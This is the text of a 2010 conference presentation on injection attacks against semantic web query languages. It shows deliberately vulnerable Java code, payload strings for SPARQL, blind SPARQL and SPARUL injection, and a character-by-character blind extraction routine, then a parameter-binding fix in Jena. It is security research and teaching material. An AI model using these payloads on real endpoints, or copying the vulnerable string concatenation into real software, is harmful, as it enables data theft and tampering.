Presentation at JSWEB2010, Valencia, September 2010
Outline: Introduction; Vulnerable code samples; Addressing code injection; Conclusions
Addressing Security Issues in the Semantic Web: Injection attacks in the Semantic Query Languages
Pablo Orduna, Aitor Almeida, Unai Aguilera, Xabier Laiseca, Diego Lopez-de-Ipina, Aitor Gomez-Goiri
September 9th, 2010
Future Internet - Programme for collaborative strategic research; ETORTEK 2008
P. Orduna, A. Almeida, U. Aguilera, X. Laiseca, D. Lopez-de. . . Addressing Security Issues in the Semantic Web: Injection att. . .
Introduction
The Semantic Web is based on a set of technologies:
XML, RDF, OWL, ...
Query Languages
New technologies have been developed to query the ontologies: RDQL, later SPARQL, and later SPARUL.
These new query languages are based on SQL.
RDQL and SPARQL are read-only query languages; SPARUL (SPARQL/Update) introduces modification capabilities.
SPARQL Sample:
    PREFIX injection: <http://www.morelab.deusto.es/injection.owl#>
    SELECT ?p1
    WHERE {
      ?p1 a injection:Person .
    }
Security issues
The use of these new query languages introduces vulnerabilities already found in the bad use of older query languages.
Attacks like SQL Injection, LDAP Injection or even XPath Injection are already well known, and libraries provide tools to sanitize user input in these languages.
A proper usage of the query languages is required in order to face new techniques, including:
(Blind) SPARQL Injection
SPARUL Injection
SPARQL Injection
Introducing SPARQL Injection
The following query is assumed to retrieve the friends of a user whose fullName is provided by the variable name.
The ontology is available at http://www.morelab.deusto.es/injection.owl
SPARQL Injection
    String queryString =
        "PREFIX injection: <http://www.morelab.deusto.es/injection.owl#> " +
        "SELECT ?name1 ?name2 " +
        "WHERE {" +
        "  ?p1 a injection:Person . " +
        "  ?p2 a injection:Person . " +
        "  ?p1 injection:fullName '" + name + "' . " +
        "  ?p1 injection:isFriendOf ?p2 . " +
        "  ?p1 injection:fullName ?name1 . " +
        "  ?p2 injection:fullName ?name2 . " +
        "}";
    Query query = QueryFactory.create(queryString);
SPARQL Injection
Introducing SPARQL Injection
This code can be exploited to retrieve any information in the ontology. The problem is that the variable name has not been sanitized.
This variable can include SPARQL code, and thus modify the query itself. A variable with malicious content can be found in the next slide.
Appending the Strings
    // Malicious content for the variable name
    String name = "Pablo Orduna' . " +
        "?b1 a injection:Building . " +
        "?b1 injection:name ?name1 . " +
        "} #";
    String queryString =
        "PREFIX injection: <http://www.morelab.deusto.es/injection.owl#> " +
        "SELECT ?name1 ?name2 WHERE {" +
        "  ?p1 a injection:Person . " +
        "  ?p2 a injection:Person . " +
        "  ?p1 injection:fullName '" + name + "' . " +
        "  ?p1 injection:isFriendOf ?p2 . " +
        "  ?p1 injection:fullName ?name1 . " +
        "  ?p2 injection:fullName ?name2 . " +
        "}";
Appending the Strings
    String queryString =
        "PREFIX injection: <http://www.morelab.deusto.es/injection.owl#> " +
        "SELECT ?name1 ?name2 WHERE {" +
        "  ?p1 a injection:Person . " +
        "  ?p2 a injection:Person . " +
        "  ?p1 injection:fullName '" + "Pablo Orduna' . " +
        "  ?b1 a injection:Building . " +
        "  ?b1 injection:name ?name1 . " +
        "  } #" + "' . " +
        "  ?p1 injection:isFriendOf ?p2 . " +
        "  ?p1 injection:fullName ?name1 . " +
        "  ?p2 injection:fullName ?name2 . " +
        "}";
The final query
    String queryString =
        "PREFIX injection: <http://www.morelab.deusto.es/injection.owl#> " +
        "SELECT ?name1 ?name2 WHERE {" +
        "  ?p1 a injection:Person . " +
        "  ?p2 a injection:Person . " +
        "  ?p1 injection:fullName 'Pablo Orduna' . " +
        "  ?b1 a injection:Building . " +
        "  ?b1 injection:name ?name1 . " +
        "  } #" + /* From this point everything is commented and thus ignored */
        "' . " +
        "  ?p1 injection:isFriendOf ?p2 . " +
        "  ?p1 injection:fullName ?name1 . " +
        "  ?p2 injection:fullName ?name2 . " +
        "}";
SPARQL Injection
This code will return the name of the building instead of the name of a user.
It is possible to use the flexibility of SPARQL to perform other kinds of queries retrieving any information in the ontology.
Blind SPARQL Injection
Introducing Blind SPARQL Injection
The previous sample was especially vulnerable since it returned a string: it is possible to retrieve any information as a string.
Strings are usually not retrieved in SPARQL, but individuals.
What if the returning value is an individual?
It's still possible to retrieve any information: if it's possible to know whether a given query is true or false, it's possible to iteratively retrieve any information.
The following code retrieves the individuals themselves. It's possible to know whether the query provided the individuals or not.
Blind SPARQL Injection
    String queryString =
        "PREFIX xsd: <http://www.w3.org/2001/XMLSchema#> " +
        "PREFIX injection: <http://www.morelab.deusto.es/injection.owl#> " +
        "SELECT ?p1 ?p2 " +
        "WHERE {" +
        "  ?p1 a injection:Person . " +
        "  ?p2 a injection:Person . " +
        "  ?p1 injection:fullName '" + name + "'^^xsd:string . " +
        "  ?p1 injection:isFriendOf ?p2 . " +
        "}";
    Query query = QueryFactory.create(queryString);
Blind SPARQL Injection
Once again, the variable name has not been sanitized, so it's still possible to inject SPARQL code.
The injected code can't return a building or the building name. But, adding a condition like "does the building name start with this letter", we will get:
The common results → so the building name starts with that letter
No results → so the building name does not start with that letter
Blind SPARQL Injection
    // Malicious content for the variable name; s is the letter being tested
    String name = "Pablo Orduna' . " +
        "?b1 a injection:Building . " +
        "?b1 injection:name ?buildingName . " +
        "FILTER regex(?buildingName, \"^" + s + ".*\") . " +
        "} #"; // }:-D
    String queryString = /* PREFIXES ... */
        "SELECT ?p1 ?p2 " +
        "WHERE {" +
        "  ?p1 a injection:Person . " +
        "  ?p2 a injection:Person . " +
        "  ?p1 injection:fullName '" + name + "'^^xsd:string . " +
        "  ?p1 injection:isFriendOf ?p2 . " +
        "}";
The final query would be. . .
    "PREFIX xsd: <http://www.w3.org/2001/XMLSchema#> " +
    "PREFIX injection: <http://www.morelab.deusto.es/injection.owl#> " +
    "SELECT ?p1 ?p2 WHERE {" +
    "  ?p1 a injection:Person . " +
    "  ?p2 a injection:Person . " +
    "  ?p1 injection:fullName 'Pablo Orduna' . " +
    "  ?b1 a injection:Building . " +
    "  ?b1 injection:name ?buildingName . " +
    "  FILTER regex(?buildingName, \"^" + s + ".*\") . " +
    "  } #" + /* from here ignored */ "'^^xsd:string . " +
    "  ?p1 injection:isFriendOf ?p2 . }";
Querying recursively. . .
    // POSSIBLE_LETTERS (the charset tried at each position) and tryBlind
    // (which runs the injected query with the given prefix and reports
    // whether it returned results) are defined elsewhere in the sample.
    public static String recursively(String letters) throws Exception {
        for (int i = 0; i < POSSIBLE_LETTERS.length(); ++i) {
            char c = POSSIBLE_LETTERS.charAt(i);
            if (tryBlind(letters + c)) {
                System.out.println(c);
                return "" + c + recursively(letters + c);
            }
        }
        return "";
    }
Blind SPARQL Injection
It is possible to optimize this system using binary search: performing queries using regular expressions like ^[A-M].* tells whether the char is between the chars A and M.
Given a charset of length 64, this would reduce the number of iterations from 64 times 10 (640) to 6 times 10 (60).
Using the whole UTF-16 charset, it would reduce the number of iterations from 65536 times 10 (655360) to 16 times 10 (160).
The point is that it's possible to retrieve any information in the ontology independently of the values returned by the query.
SPARUL Injection
Introducing SPARQL/Update Injection
All the previous examples are executed in read-only query languages. SPARUL introduces the chance to modify the ontology: INSERT, MODIFY and DELETE statements are available.
The following sample modifies the fullName of the resource injection:Pablo, setting it to the value of the variable name.
SPARUL Injection
    String updateString =
        "PREFIX injection: <http://www.morelab.deusto.es/injection.owl#> " +
        "PREFIX xsd: <http://www.w3.org/2001/XMLSchema#> " +
        "DELETE {" +
        "  injection:Pablo injection:fullName ?name1 " +
        "} WHERE {" +
        "  injection:Pablo injection:fullName ?name1 " +
        "}\n INSERT {" +
        "  injection:Pablo injection:fullName '" + name + "'^^xsd:string " +
        "}";
    UpdateRequest update = UpdateFactory.create(updateString);
SPARUL Injection
    String name = "Pablo Ordunya'^^xsd:string" +
        "} \n " +
        "INSERT {" +
        "  injection:Pablo injection:isFriendOf injection:EvilMonkey" +
        "} #"; // }:-D
    String result = sample.run(name);
With this vulnerability, it is possible to modify the whole ontology.
Addressing code injection
Mechanisms provided by the library must be used (if provided).
It is not as simple as escaping the ' characters: the string \u0027 is a simple quote, just as in Java:
    System.out.println("a\u0022.length() +\u0022b".length());
    // This code prints "2", the result of ("a".length() + "b".length()),
    // since \u0022 will be replaced by " even if it is commented or inside a String.
Frameworks
In Jena, the initialBinding argument can be used in the QueryExecutionFactory, so the user value is bound to a query variable instead of being concatenated into the query text:
    // initial binding
    QuerySolutionMap initialBinding = new QuerySolutionMap();
    RDFNode parameterizedName = model.createLiteral(name);
    initialBinding.add("thename", parameterizedName); // binds ?thename in the query

    // Perform the query
    Query query = QueryFactory.create(queryString);
    QueryExecution qe = QueryExecutionFactory.create(query, model, initialBinding);
    ResultSet results = qe.execSelect();
Conclusions
Not sanitizing the user input might add a set of security vulnerabilities to our systems.
In the paper it is presented how new query languages inherit security issues present in older query languages, and therefore these issues should also be taken into account when working with them.
Questions?
DeustoTech - Internet
http://www.morelab.deusto.es
Pablo Orduna [email protected]
Aitor Almeida [email protected]
Unai Aguilera [email protected]
Xabier Laiseca [email protected]
Diego Lopez-de-Ipina [email protected]
Aitor Gomez-Goiri [email protected]